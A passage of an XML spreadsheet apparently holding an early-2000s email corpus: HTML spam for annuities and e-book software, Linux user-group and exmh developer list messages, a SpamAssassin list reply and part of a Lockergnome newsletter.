   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/milner/20020508-103b.jpg" width=3D"236" =
 height=3D"215"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/milner/20020508-104b.gif" =
 width=3D"314" height=3D"137" alt=3D"3 YEAR ANNUITY&amp;#10;Guaranteed 5% =
 Rate&amp;#10;3.25% Commission&amp;#10;3 Year Surrender"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/milner/20020508-105b.jpg" =
 width=3D"314" height=3D"78" alt=3D"Limited Time Only!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
       &lt;img src=3D"http://iiq.us/images/milner/2002spcr.gif" width=3D"10" =
 height=3D"10"&gt;&lt;br&gt;
       &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Call or =
 &lt;a href=3D"mailto:ANNUITIES@INSUR-SAFE.COM"&gt;e-mail&lt;/a&gt; us today!&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/milner/20020508-201b.jpg" =
 width=3D"535" height=3D"86" alt=3D'800-553-2391'&gt;=20
       &lt;br&gt;
       &amp;#151; or &amp;#151;&lt;/b&gt;&lt;br&gt;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size=3D"50"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td colspan=3D"4"&gt;=20
                     &lt;input type=3D"text" name=3D"phone" size=3D"50"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D"30%"&gt;=20
                     &lt;input type=3D"text" name=3D"city" size=3D"20"&gt;
                   &lt;/td&gt;
                   &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D"20%"&gt;=20
                     &lt;input type=3D"text" name=3D"state"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name=3D"hdnRecipientTxt" =
 value=3D"ANNUITIES@INSUR-SAFE.COM"&gt;
                      &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Milner Group Ad Inquiry"&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &amp;nbsp;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/milner/20020508-202b.gif" width=3D"487" =
 height=3D"126"&gt;&lt;br&gt;
       &amp;nbsp; &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%"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href=3D"http://www.insiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_49E3B3_01C20A41.97599E20--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Backup solutions
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,
 I maintain a colocated server on behalf of a small group of individuals,
 and am looking at backup solutions. Is it possible to get some sort of low-
 end internal tape / other solution that could be used to back up approx. 40
 Gigs of data or am I just dreaming? My ISP does offer backups at extra cost
 but the only problem with that is, well, the extra cost.
 What I was hoping to do was to install some kind of internal tape device,
 then swap tapes round every month, so I had an onsite backup of say the
 last 24 hours and an offsite backup of the last month. Is this feasible?
 I'm beginning to think it isn't. External devices are not an option as part
 of the charge for colocation is rackspace.
 Thanks,
 Ciaran.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: lifegem
</t>
  </si>
  <si>
    <t xml:space="preserve">Joseph S. Barrera III wrote:
 &gt; Chris Haun wrote:
 &gt;
 &gt;&gt; A LifeGem is a certified, high quality diamond created from the 
 &gt;&gt; carbon of your loved one as a memorial to their unique and wonderful 
 &gt;&gt; life.
 &gt;
 &gt;
 &gt; Why wait until you're dead? I'm sure there's enough carbon in
 &gt; the fat from your typical liposuction job to make a decent diamond.
 &gt;
 &gt; - Joe
 &gt;
 Oh, hell - what about excrement? I'd love to be able to say - No, the 
 sun doesn't shine out of my ass, but there's the occasional diamond. ;-).
 Owen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: &lt;strong&gt;Two New AmphetaDesk Hacks&lt;/strong&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: 4538e94b3b2c6b19041756b37b1f9916
 Date: Not supplied
 Since the AmphetaDesk source code is so easily modifiable on any platform, I've 
 been seeing some interesting hacks and modifications lately. The most powerful 
 of them is l.m. orchard's newest template[1], which provides an insane amount 
 of new features, including hiding old items, click counting, and an outline 
 based format. More than likely, a revised version of his hack will appear as a 
 selectable template in the next version (AmphetaDesk v0.94). 
 Also of interest is Brian Cantoni's FTPStore[2]: _"FTPstore is a slight 
 addition to the AmphetaDesk news aggregator. The modified code will retrieve 
 the personal channel list from an FTP location during startup and store it back 
 to the same location during shutdown. This provides a simple method to keep 
 your saved channels in a network location. If you use AmphetaDesk at home and 
 at work, for example, this feature will let you keep your list of channels in 
 sync."_ It's a major improvement for AmphetaDesk users with multiple machines.
 [1] http://www.decafbad.com/news_archives/000228.phtml
 [2] http://www.cantoni.org/software/amphetadesk.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Publish Like a Professional
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!7190cBgu7-127WyoJ06l18&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Page 
 Author&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PAGE AUTHOR&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from the following Display 
 Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="webmaster@efi.ie
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Oops - turns out i wasn't careful installing it, so the exmh(library)
 variable was pointing at my old installation.  I'm surprised it worked
 as well as it did.
 In any case, I removed the old library directory, and edited exmh,
 exmh-bg, exmh-strip, etc to point at the right one.  Now I'm getting
 another traceback on startup:
 can't read "mhPriv(pubseq,family,cur)": no such variable
     while executing
 "MhSeq $folder $seq add $mhPriv(pubseq,$folder,$seq) [MhSeqExpand
 $folder $msgids"
     (procedure "MhReadSeqs" line 73)
     invoked from within
 "MhReadSeqs $folder seqs"
     (procedure "Mh_Sequences" line 2)
     invoked from within
 "Mh_Sequences $folder"
     (procedure "Flist_UnseenUpdate" line 4)
     invoked from within
 "Flist_UnseenUpdate $folder"
     (procedure "FolderChange" line 51)
     invoked from within
 "FolderChange family {Msg_Show cur}"
     invoked from within
 "time [list  FolderChange $folder $msgShowProc"
     (procedure "Folder_Change" line 3)
     invoked from within
 "Folder_Change $exmh(folder)"
     (procedure "Exmh" line 101)
     invoked from within
 "Exmh"
     ("after" script)
 +family is the folder I was in when I quit exmh.
 I'm on a remote display right now, and its really slow.  I'll have to
 play with it more tonight when I get home to see if there are any
 other problems. 
 Scott
 &gt; &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; &gt; Date:  Sun, 22 Sep 2002 22:58:16 -0400
 &gt; &gt;
 &gt; &gt; I just updated to the latest CVS - I had been running a build from June.  
 &gt; &gt; Hitting the Flist button gives the following traceback:
 &gt; &gt; 
 &gt; &gt; syntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"
 &gt; &gt;     while executing
 &gt; &gt; "expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMs
 &gt; &gt; g))"
 &gt; &gt;     (procedure "Ftoc_FindMsg" line 57)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_FindMsg $i"
 &gt; &gt;     (procedure "Ftoc_ShowSequences" line 16)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_ShowSequences $F"
 &gt; &gt;     (procedure "ScanFolder" line 81)
 &gt; &gt;     invoked from within
 &gt; &gt; "ScanFolder inbox 0"
 &gt; &gt;     invoked from within
 &gt; &gt; "time [list ScanFolder $F $adjustDisplay"
 &gt; &gt;     (procedure "Scan_Folder" line 2)
 &gt; &gt;     invoked from within
 &gt; &gt; "Scan_Folder $exmh(folder) $ftoc(showNew)"
 &gt; &gt;     (procedure "Inc_PresortFinish" line 7)
 &gt; &gt;     invoked from within
 &gt; &gt; "Inc_PresortFinish"
 &gt; &gt;     invoked from within
 &gt; &gt; ".fops.flist invoke"
 &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt;     invoked from within
 &gt; &gt; "uplevel #0 [list $w invoke]"
 &gt; &gt;     (procedure "tkButtonUp" line 7)
 &gt; &gt;     invoked from within
 &gt; &gt; "tkButtonUp .fops.flist
 &gt; &gt; "
 &gt; &gt;     (command bound to event)
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; It seems to only happen in a folder with no unseen messages.
 &gt; &gt; 
 &gt; &gt; Chris, is this related to your recent changes?
 &gt; 
 &gt; Curious.  I changed the arguments to Ftoc_ShowSequences to drop the folder 
 &gt; argument and instead have an optional msgids argument.  Somehow your version 
 &gt; of ScanFolder is still trying to pass $F.  You seem to have the latest 
 &gt; ftoc.tcl (1.36), but not the latest scan.tcl (1.27).
 &gt; 
 &gt; I don't know how that happened, but try getting your source tree completely 
 &gt; up to date.
 &gt; 
 &gt; Chris
 &gt; 
 &gt; -- 
 &gt; Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 &gt; virCIO                          http://www.virCIO.Com
 &gt; 716 Congress, Suite 200
 &gt; Austin, TX  78701		+1 512 374 0500
 &gt; 
 &gt;   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; --==_Exmh_1988991284P
 &gt; Content-Type: application/pgp-signature
 &gt; 
 &gt; -----BEGIN PGP SIGNATURE-----
 &gt; Version: GnuPG v1.0.6 (GNU/Linux)
 &gt; Comment: Exmh version 2.2_20000822 06/23/2000
 &gt; 
 &gt; iD8DBQE9jygSK9b4h5R0IUIRAix6AJ9CorKpwn/5KatPB2QytCyr1mVP5QCfd84d
 &gt; CBV9usxWABobTcDTVHm8fLY=
 &gt; =xJhj
 &gt; -----END PGP SIGNATURE-----
 &gt; 
 &gt; --==_Exmh_1988991284P--
 &gt; 
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] OT: DNS MX Record Clarification Please
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-09-13 at 14:33, vernon wrote:
 &gt; 
 &gt; But only some of the mail is actually being scanned which leads me to
 &gt; believe that not all of the mail is actually hitting that box and the 10
 &gt; never goes down. Why? Have I got something confused here?
 &gt; 
 Sending mail directly to a backup mail server in the hopes that it has
 less stringent spam scanning is a common spammer trick.
 -- 
 Jason Kohles                                 jkohles@redhat.com
 Senior Engineer                 Red Hat Professional Consulting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</si>
  <si>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Re: New Sequences Window
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-199405358P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Valdis.Kletnieks@vt.edu
 &gt; Date:  Wed, 21 Aug 2002 02:36:56 -0400
 &gt;
 &gt; --==_Exmh_778588528P
 &gt; Content-Type: text/plain; charset=us-ascii
 &gt; 
 &gt; On Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said:
 &gt; 
 &gt; &gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everybod
 &gt; y's
 &gt; &gt; looking at a big box that has unseen and pseq in it.  Might want to add
 &gt; &gt; 'pseq' to the 'hide by default' list....
 &gt; 
 &gt; Was it intended that if you added a sequence to the 'never show' list that
 &gt; it not take effect till you stopped and restarted exmh?  I added 'pseq',
 &gt; then hit 'save' for Preferences - didn't take effect till I restarted.
 No it wasn't, and at one point it worked fine.  I'll check and see why it 
 stopped working.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-199405358P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y66GK9b4h5R0IUIRAsIYAJ4zEJm2B6tIQDD4MQu7LbapzZpAsgCcCJtl
 bDfb8a2wKMtAgWylF44XooU=
 =WC8I
 -----END PGP SIGNATURE-----
 --==_Exmh_-199405358P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Digital Media]  Clever Ritual
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020722.html"&gt;
       http://www.lockergnome.com/issues/digitalmedia/20020722.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgmedia-2534370N@sprocket.lockergnome.com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scrollbar-3dlight-color: #DEE8EC; scrollbar-arrow-color: #000000; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #507686; scrollbar-face-color: #A9C4CF; scrollbar-highlight-color: #DEE8EC; scrollbar-shadow-color: #507686 }
  a:link    { COLOR: #0000FF; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #26343A; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 4px solid; BORDER-LEFT: #DEE8EC 4px solid; BORDER-RIGHT: #507686 4px solid; BORDER-TOP: #DEE8EC 4px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #A9C4CF; BORDER-BOTTOM: #507686 3px solid; BORDER-LEFT: #DEE8EC 3px solid; BORDER-RIGHT: #507686 3px solid; BORDER-TOP: #DEE8EC 3px solid; COLOR: #26343A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020722 Lockergnome Digital Media&lt;/title&gt;&lt;/head&gt;
 &lt;body     MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"     style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#26343A" alink="#008080" link="#0000FF" vlink="#26343A"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/dn.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;center&gt;
  &lt;a href="http://www.lockergnome.com/"&gt;&lt;img src="http://images.lockergnome.com/images/gnomedaily.gif" width="50" height="60" hspace="5" alt="Lockergnome" border="0"&gt;&lt;/a&gt;
 &lt;a target="_blank" href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=30818"&gt;&lt;img src="http://www.lockergnome.com/images/ads/textaloud468x60.gif" width="468" height="60" alt="See You at Gnomedex 2002!" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp;07.22.2002 MediaREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;TextAloud MP3 converts text to speech and to MP3&lt;/b&gt; 
 Listen to email, Web pages, e-books, and more on your PC or 
 portable MP3 player.  As featured in PC Magazine, The New 
 York Times, and on CNN.  Now available with optional
 AT&amp;T Natural Voices, the most advanced computer speech for your PC. 
 &lt;a href="http://wcarchive.cdrom.com/pub/bws/bws_44/TA_demo.mp3" target="_blank"&gt;Listen to a demo&lt;/a&gt;, then 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=30818"&gt;download your trial copy&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Lockergnome's Guide to Converting Vinyl LPs to CD is no longer free. 
 Over the last 10 days, almost 4,000 people downloaded the free tome. 
 Of that 4,000, close to half put in a fake e-mail address, resulting 
 in a ridiculous number of bounce messages in my inbox. Add to that 
 the fact that several of the clever individuals used other people's 
 real addresses, which then amounted to complaints of spam from the 
 address owners. It's not worth providing a free service if it causes 
 Lockergnome to be labeled a spammer as a result. The crowning gem was 
 the in-duh-vidual who used the name A** Hole and Chris's personal 
 address to download the PDF. On a more positive note, the guide is 
 &lt;a href="http://www.gnometomes.com/tome/001962.html"&gt;now available in all six formats&lt;/a&gt;,  
 for the minimal price of $5, complete with some additional content 
 based on a couple reader suggestions.
 &lt;p&gt;
 Chris may have an obsession with Peets coffee, but I'll bet he's never 
 been the daily special. On my visit to St. Louis, for the 
 &lt;a href="http://www.sic.org"&gt;SIC&lt;/a&gt;, I 
 started every morning with a walk to the West Port Starbucks. 
 Apparently my morning ritual was a source of entertainment for the 
 employees, which evolved into discussions of a reality based TV show 
 based on the concept of stalking me. I've even got the 
 &lt;a href="http://www.lockergnome.com/images/jakepics/starbucks.jpg"&gt;incriminating evidence&lt;/a&gt; 
 to prove it.
 &lt;p&gt;
 The SIC provided me the opportunity to see some cool updates to a couple 
 titles, in addition to being introduced to some useful audio oriented 
 titles I'd never seen before. Expect a number of reviews over the next 
 several weeks, as well as extensive coverage of last week's events in 
 St. Louis in the annual SIC special issue. Lori managed to score a few 
 more Gnomedex giveaways while we were in attendance, so those of you who 
 sign up will be coming home with even more goodies, which, by the way, 
 aren't of the stressball and pen variety -- we're talking software 
 titles with reg codes.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- PRODUCER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomePRODUCER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;NVIDIA CONTEST - SIGGRAPH 2002&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.siggraph.org/s2002/flashhome.html"&gt;http://www.siggraph.org/s2002/flashhome.html&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.nvidia.com/"&gt;http://www.nvidia.com/&lt;/a&gt;&lt;p&gt;
 If you're in San Antonio July 23-25, for this year's Siggraph conference, 
 you'll want to stop by the nVidia booth (#19102). Every 30 minutes 10 
 people will be competing for a NVIDIA Quadro4 750 XGL professional 
 graphics solution, using NVIDIA-provided traditional art materials such 
 as charcoal, pastels, crayons and paper to create something artistic. 
 All artwork must be original, unpublished work. Artwork must also
 incorporate the NVIDIA logo and be created on-site at SIGGRAPH during the
 10-minute contest round. Judging will be based on artistry; creativity and
 originality; technical merit; and theme incorporation. Artwork will not be
 returned to contestants and will become the property of NVIDIA as outlined
 in the contest registration form. Even if you don't win, you'll still get a free t-shirt.
 &lt;!-- FEATURE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFEATURE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;DreamQuest Championship Card Games&lt;/b&gt;&lt;br&gt;
 For Pocket PC, Palm, Symbian OS&lt;p&gt;
 &lt;a class="url" href="http://www.dq.com/palm.html"&gt;http://www.dq.com/palm.html&lt;/a&gt;&lt;p&gt;
 Playing games on a PDA has killed plenty of my time spent waiting in 
 airports around the US. With the recent porting of these three classic 
 PC card games from DreamQuest, I've added some of the best in PC 
 entertainment to my arsenal of PDA diversions. Hearts, Spades and Euchre 
 all play in a similar manner to their PC versions, only on a smaller 
 screen. Available for Pocket PC, Palm, and even the Symbian OS, you can 
 play cards against computer opponents or connect to the online game room 
 and challenge other players using any of the games multiple platforms. 
 This is a unique experience currently unavailable for any other pocket games. 
 &lt;!-- SKIN --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSKIN&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deskmod.com/backend/deskmod/ln.php --&gt;
